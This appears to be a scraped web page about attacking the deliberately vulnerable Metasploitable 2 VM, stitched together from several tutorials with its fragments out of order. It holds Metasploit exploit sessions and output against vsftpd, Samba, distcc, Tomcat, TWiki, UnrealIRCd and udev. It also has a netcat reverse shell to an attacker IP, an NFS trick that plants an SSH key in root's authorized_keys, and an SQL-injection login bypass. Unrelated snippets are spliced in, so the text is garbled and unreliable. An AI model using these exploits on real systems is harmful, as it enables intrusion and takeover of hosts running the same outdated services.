metasploitable 2 list of vulnerabilities

[*] instance eval failed, trying to exploit syscall -- ---- Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator. One way to accomplish this is to install Metasploitable 2 as a guest operating system in Virtual Box and change the network interface settings from "NAT" to "Host Only". Here's what's going on with this vulnerability. whoami Depending on the order in which guest operating systems are started, the IP address of Metasploitable 2 will vary. More investigation would be needed to resolve it. Every CVE Record added to the list is assigned and published by a CNA. RPORT 3632 yes The target port msf exploit(twiki_history) > set RHOST 192.168.127.154 Metasploitable is a Linux virtual machine which we deliberately make vulnerable to attacks. Name Disclosure Date Rank Description This virtual machine (VM) is compatible with VMWare, VirtualBox, and other common virtualization platforms. Have you used Metasploitable to practice Penetration Testing? -- ---- payload => java/meterpreter/reverse_tcp TOMCAT_PASS no The Password for the specified username For instance, to use native Windows payloads, you need to pick the Windows target. [*] Writing to socket A These are the default statuses which can be changed via the Toggle Security and Toggle Hints buttons. payload => linux/x86/meterpreter/reverse_tcp A test environment provides a secure place to perform penetration testing and security research. payload => cmd/unix/reverse The purpose of a Command Injection attack is to execute unwanted commands on the target system. The PHP info information disclosure vulnerability provides internal system information and service version information that can be used to look up vulnerabilities. DATABASE template1 yes The database to authenticate against Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by. RHOST yes The target address The Nessus scan exposed the vulnerability of the TWiki web application to remote code execution. msf2 has an rsh-server running and allowing remote connectivity through port 513. USERNAME postgres no A specific username to authenticate as The interface looks like a Linux command-line shell. Proxies no Use a proxy chain Exploit target: :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead RPORT 8180 yes The target port The same exploit that we used manually before was very simple and quick in Metasploit. To do so (and because SSH is running), we will generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account's authorized_keys file: On port 21, Metasploitable2 runs vsftpd, a popular FTP server. Metasploit Pro offers automated exploits and manual exploits. Setting 3 levels of hints from 0 (no hints) to 3 (maximum hints). Be sure your Kali VM is in "Host-only Network" before starting the scan, so you can communicate with your target Metasploitable VM. And this is what we get: RHOST yes The target address [*] Started reverse double handler Module options (exploit/multi/http/tomcat_mgr_deploy): THREADS 1 yes The number of concurrent threads The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023. It is also instrumental in Intrusion Detection System signature development. Totals: 2 Items. DB_ALL_USERS false no Add all users in the current database to the list Back on the Login page try entering the following SQL Injection code with a trailing space into the Name field: The Login should now work successfully without having to input a password! Id Name [*] A is input [*] Reading from socket B msf auxiliary(telnet_version) > set RHOSTS 192.168.127.154 So lets try out every port and see what were getting. [*] Backgrounding session 1 [*] Reading from socket B It is inherently vulnerable since it distributes data in plain text, leaving many security holes open. [*] A is input -- ---- ---- --------------- -------- ----------- [*] Uploading 13833 bytes as RuoE02Uo7DeSsaVp7nmb79cq.war This is the action page. Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. now you can do some post exploitation. [*] Command: echo f8rjvIDZRdKBtu0F; msf exploit(vsftpd_234_backdoor) > exploit RHOST => 192.168.127.154 Before running it, you need to download the pre-calculated vulnerable keys from the following links: http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 (RSA keys), http://www.exploit-db.com/sploits/debian_ssh_dsa_1024_x86.tar.bz2 (DSA keys), ruby ./5632.rb 192.168.127.154 root ~/rsa/2048/. Thus, we can infer that the port is TCP Wrapper protected. I employ the following penetration testing phases: reconnaisance, threat modelling and vulnerability identification, and exploitation. Open in app. Name Disclosure Date Rank Description STOP_ON_SUCCESS => true The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities. In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. msf exploit(twiki_history) > set payload cmd/unix/reverse [*] trying to exploit instance_eval When hacking computer systems, it is essential to know which systems are on your network, but also know which IP or IPs you are attempting to penetrate. Remote code execution vulnerabilities in dRuby are exploited by this module. . It is also possible to abuse the manager application using /manager/html/upload, but this approach is not incorporated in this module. msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev Module options (exploit/multi/samba/usermap_script): You could log on without a password on this machine. Step 4: ChooseUse anexisting virtual hard drive file, clickthe folder icon and select C:/users/UserName/VirtualBox VMs/Metasploitable2/Metasploitable.vmdk. [*] Command shell session 4 opened (192.168.127.159:8888 -> 192.168.127.154:33966) at 2021-02-06 23:51:01 +0300 Do you have any feedback on the above examples or a resolution to our TWiki History problem? The ingreslock port was a popular choice a decade ago for adding a backdoor to a compromised server. Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. S /tmp/run The vulnerability present in samba 3.x - 4.x has several vulnerabilities that can be exploited by using Metasploit module metasploit module: exploit/multi/samba/usermap_script set RHOST- your Remote machine IP then exploit finally you got a root access of remote machine. After the virtual machine boots, login to console with username msfadmin and password msfadmin. msf exploit(tomcat_mgr_deploy) > set RPORT 8180 Since we noticed previously that the MySQL database was not secured by a password, were going to use a brute force auxiliary module to see whether we can get into it. We can now look into the databases and get whatever data we may like. Essentially thistests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. -- ---- RHOST yes The target address Module options (auxiliary/scanner/postgres/postgres_login): whoami individual files in /usr/share/doc/*/copyright. Id Name VHOST no HTTP server virtual host Nessus, OpenVAS and Nexpose VS Metasploitable. Metasploitable Networking: [*] Reading from socket B RPORT 80 yes The target port RHOST => 192.168.127.154 payload => cmd/unix/interact Time for some escalation of local privilege. Both operating systems will be running as VMs within VirtualBox. [*] Automatically selected target "Linux x86" Login with the above credentials. [*] Reading from socket B [*] Accepted the second client connection Both operating systems will be running as VM's within VirtualBox. msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.127.154 We can demonstrate this with telnet or use the Metasploit Framework module to automatically exploit it: On port 6667, Metasploitable2 runs the UnreaIRCD IRC daemon. 865.1 MB. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host root, msf > use auxiliary/admin/http/tomcat_administration Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. By Ed Moyle, Drake Software Nowhere is the adage "seeing is believing" more true than in cybersecurity. echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539] A Computer Science portal for geeks. [*] chmod'ing and running it -- ---- Metasploitable 2 is a straight-up download. Stop the Apache Tomcat 8.0 Tomcat8 service. Loading of any arbitrary file including operating system files. [*] Started reverse handler on 192.168.127.159:4444 Metasploit has a module to exploit this in order to gain an interactive shell, as shown below. Below is a list of the tools and services that this course will teach you how to use. Metasploitable is installed, msfadmin is user and password. LPORT 4444 yes The listen port High-end tools like Metasploit and Nmap can be used to test this application by security enthusiasts. msf exploit(java_rmi_server) > set LHOST 192.168.127.159 Just enter ifconfig at the prompt to see the details for the virtual machine. So, lets set it up: mkdir /metafs # this will be the mount point, mount -t nfs 192.168.127.154:/ /metafs -o nolock # mount the remote shared directory as nfs and disable file locking. For network clients, it acknowledges and runs compilation tasks. We did an aggressive full port scan against the target. [*] Meterpreter session, using get_processes to find netlink pid RHOSTS yes The target address range or CIDR identifier Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. msf exploit(usermap_script) > set RHOST 192.168.127.154 In our previous article on How To install Metasploitable we covered the creation and configuration of a Penetration Testing Lab. URIPATH no The URI to use for this exploit (default is random) Lets begin by pulling up the Mutillidae homepage: Notice that the Security Level is set to 0, Hints is also set to 0, and that the user is not Logged In. [*] Matching Before we perform further enumeration, let us see whether these credentials we acquired can help us in gaining access to the remote system. These backdoors can be used to gain access to the OS. ---- --------------- -------- ----------- msf exploit(usermap_script) > exploit However this host has old versions of services, weak passwords and encryptions. Vulnerability Management Nexpose From the results, we can see the open ports 139 and 445. Name Current Setting Required Description NetlinkPID no Usually udevd pid-1. However, we figured out that we could use Metasploit against one of them in order to get a shell, so were going to detail that here. ---- --------------- -------- ----------- Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM). Name Current Setting Required Description Cross site scripting via the HTTP_USER_AGENT HTTP header. It is freely available and can be extended individually, which makes it very versatile and flexible. Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather out dated OWASP Top 10. Andrea Fortuna. I hope this tutorial helped to install metasploitable 2 in an easy way. Learn ethical hacking, penetration testing, cyber security, best security and web penetration testing techniques from best ethical hackers in security field. Currently, there is metasploitable 2, hosting a huge variety of vulnerable services and applications based on Ubuntu 8.04, and there is a newer Metasploitable 3 that is Windows Server 2008, or . Combining Nmap with Metasploit for a more detailed and in-depth scan on the client machine. LHOST yes The listen address msf exploit(udev_netlink) > set SESSION 1 What is Metasploit This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems. Luckily, the Metasploit team is aware of this and released a vulnerable VMware virtual machine called 'Metasploitable'. Ultimately they all fall flat in certain areas. msf exploit(distcc_exec) > show options Therefore, well stop here. For hints & tips on exploiting the vulnerabilities there are also View Source and View Help buttons. A reinstall of Metasploit was next attempted: Following the reinstall the exploit was run against with the same settings: This seemed to be a partial success a Command Shell session was generated and able to be invoked via the sessions 1 command. However the .rhosts file is misconfigured. You can do so by following the path: Applications Exploitation Tools Metasploit. Step 8: Display all the user tables in information_schema. RPORT 23 yes The target port If so please share your comments below. The-e flag is intended to indicate exports: Oh, how sweet! payload => java/meterpreter/reverse_tcp msf exploit(distcc_exec) > set RHOST 192.168.127.154 [*] Successfully sent exploit request Keywords vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux Introduction Metasploitable 3 is an intentionally vulnerable Windows Server 2008R2 server, and it is a great way to learn about exploiting windows operating systems using Metasploit. -- ---- In the video the Metasploitable-2 host is running at 192.168.56.102 and the Backtrack 5-R2 host at 192.168.56.1.3. Digital Forensics and Incident Response (DFIR), Cloud Security with Unlimited Vulnerability Management, 24/7 MONITORING & REMEDIATION FROM MDR EXPERTS, SCAN MANAGEMENT & VULNERABILITY VALIDATION, PLAN, BUILD, & PRIORITIZE SECURITY INITIATIVES, SECURE EVERYTHING CONNECTED TO A CONNECTED WORLD, THE LATEST INDUSTRY NEWS AND SECURITY EXPERTISE, PLUGINS, INTEGRATIONS & DEVELOPER COMMUNITY, UPCOMING OPPORTUNITIES TO CONNECT WITH US. What Is Metasploit? LHOST => 192.168.127.159 [*] Matching Set Version: Ubuntu, and to continue, click the Next button. It requires VirtualBox and additional software. msf exploit(vsftpd_234_backdoor) > show options To access a particular web application, click on one of the links provided. [*] Found shell. In this demonstration we are going to use the Metasploit Framework (MSF) on Kali Linux against the TWiki web app on Metasploitable. At a minimum, the following weak system accounts are configured on the system. I thought about closing ports but i read it isn't possible without killing processes. Nessus was able to login with rsh using common credentials identified by finger. Either the accounts are not password-protected, or ~/.rhosts files are not properly configured. Lets go ahead. [*] Command shell session 3 opened (192.168.127.159:4444 -> 192.168.127.154:41975) at 2021-02-06 23:31:44 +0300 msf exploit(java_rmi_server) > show options Other names may be trademarks of their respective. Id Name msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159 After you log in to Metasploitable 2, you can identify the IP address that has been assigned to the virtual machine. [+] Found netlink pid: 2769 The vulnerabilities identified by most of these tools extend . root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. Commands end with ; or \g. VERBOSE false no Enable verbose output Exploit target: The following sections describe the requirements and instructions for setting up a vulnerable target. msf exploit(postgres_payload) > exploit RHOST yes The target address ---- --------------- -------- ----------- Mitigation: Update . This document outlines many of the security flaws in the Metasploitable 2 image. Module options (exploit/linux/postgres/postgres_payload): Module options (exploit/unix/ftp/vsftpd_234_backdoor): gcc root.c -o rootme (This will compile the C file to executable binary) Step 12: Copy the compiled binary to the msfadmin directory in NFS share. [*] Command: echo 7Kx3j4QvoI7LOU5z; For this walk-though I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. LPORT 4444 yes The listen port Step 9: Display all the columns fields in the . It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. LHOST => 192.168.127.159 URI => druby://192.168.127.154:8787 METASPLOIT On-Prem Vulnerability Management NEXPOSE Digital Forensics and Incident Response (DFIR) Velociraptor Cloud Risk Complete Cloud Security with Unlimited Vulnerability Management Explore Offer Managed Threat Complete MDR with Unlimited Risk Coverage Explore offer Services MANAGED SERVICES Detection and Response According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. msf auxiliary(postgres_login) > show options VHOST no HTTP server virtual host SQLi and XSS on the log are possibleGET for POST is possible because only reading POSTed variables is not enforced. Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log. Id Name To build a new virtual machine, open VirtualBox and click the New button. Use the showmount Command to see the export list of the NFS server. RPORT 80 yes The target port Name Current Setting Required Description Step 5: Display Database User. [*] 192.168.127.154:445 is running Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP) The two dashes then comment out the remaining Password validation within the executed SQL statement. Both operating systems were a Virtual Machine (VM) running under VirtualBox. Metasploit is a free open-source tool for developing and executing exploit code. RPORT => 8180 The Metasploit Framework is the most commonly-used framework for hackers worldwide. [*] Accepted the first client connection To transfer commands and data between processes, DRb uses remote method invocation (RMI). USER_AS_PASS false no Try the username as the Password for all users A Reset DB button in case the application gets damaged during attacks and the database needs reinitializing. msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact Access To access the vulnerable application, point your browser on Metasploitable3 to http://localhost:8282/struts2-rest-showcase To access the Apache Tomcat Manager, point your browser on Metasploitable3 to http://localhost:8282. On Linux multiple commands can be run after each other using ; as a delimiter: These results are obtained using the following string in the form field: The above string breaks down into these commands being executed: The above demonstrates that havoc could be raised on the remote server by exploiting the above vulnerability. Welcome to the MySQL monitor. The -Pn flag prevents host discovery pings and just assumes the host is up. msf exploit(tomcat_mgr_deploy) > exploit Name Current Setting Required Description This must be an address on the local machine or 0.0.0.0 The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities. Additionally, an ill-advised PHP information disclosure page can be found at http:///phpinfo.php. msf exploit(tomcat_mgr_deploy) > set USERNAME tomcat The main purpose of this vulnerable application is network testing. This can be done via brute forcing, SQL injection and XSS via referer HTTP headerSQL injection and XSS via user-agent string, Authentication bypass SQL injection via the username field and password fieldSQL injection via the username field and password fieldXSS via username fieldJavaScript validation bypass, This page gives away the PHP server configurationApplication path disclosurePlatform path disclosure, Creates cookies but does not make them HTML only. ---- --------------- -------- ----------- msf exploit(usermap_script) > set LHOST 192.168.127.159 Module options (auxiliary/admin/http/tomcat_administration): Payload options (cmd/unix/reverse): This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). First, from the terminal of your running Metasploitable2 VM, find its IP address.. Reference: Linux IP command examples Second, from the terminal of your Kali VM, use nmap to scan for open network services in the Metasploitable2 VM. whoami : CVE-2009-1234 or 2010-1234 or 20101234) In the next tutorial we'll use metasploit to scan and detect vulnerabilities on this metasploitable VM. Exploit target: Were 64 bit Kali, the target is 32 bit, so we compile it specifically for 32 bit: From the victim, we go to the /tmp/ directory and take the exploit from the attacking machine: Confirm that this is the right PID by looking at the udev service: It seems that it is the right one (2768-1 = 2767). msf exploit(tomcat_mgr_deploy) > show option payload => cmd/unix/reverse -- ---- The compressed file is about 800 MB and can take a while to download over a slow connection. Learn Ethical Hacking and Penetration Testing Online. [*] Scanned 1 of 1 hosts (100% complete) LHOST => 192.168.127.159 msf exploit(twiki_history) > show options root, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor [*] Writing to socket B msf exploit(udev_netlink) > show options [*] Accepted the second client connection msf auxiliary(smb_version) > set RHOSTS 192.168.127.154 RHOSTS => 192.168.127.154 Metasploitable Databases: Exploiting MySQL with Metasploit: Metasploitable/MySQL. It is a low privilege shell; however, we can progress to root through the udev exploit,as demonstrated later. Utilizing login / password combinations suggested by theUSER FILE, PASS FILE and USERPASS FILE options, this module tries to validate against a PostgreSQL instance. First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search